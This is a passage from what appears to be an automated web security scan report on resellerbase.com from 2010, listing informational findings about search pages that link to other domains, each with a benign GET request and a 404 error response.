<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.178. http://www.resellerbase.com/detail/32/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.179. http://www.resellerbase.com/detail/33/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.180. http://www.resellerbase.com/detail/34/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/34/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.181. http://www.resellerbase.com/detail/35/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/35/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.182. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.183. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.184. http://www.resellerbase.com/detail/35/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.185. http://www.resellerbase.com/detail/35/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.186. http://www.resellerbase.com/detail/36/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.187. http://www.resellerbase.com/detail/37/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.188. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.189. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.190. http://www.resellerbase.com/detail/37/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.191. http://www.resellerbase.com/detail/37/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.192. http://www.resellerbase.com/detail/38/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/38/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.193. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.194. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.195. http://www.resellerbase.com/detail/38/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.196. http://www.resellerbase.com/detail/38/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.197. http://www.resellerbase.com/detail/39/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
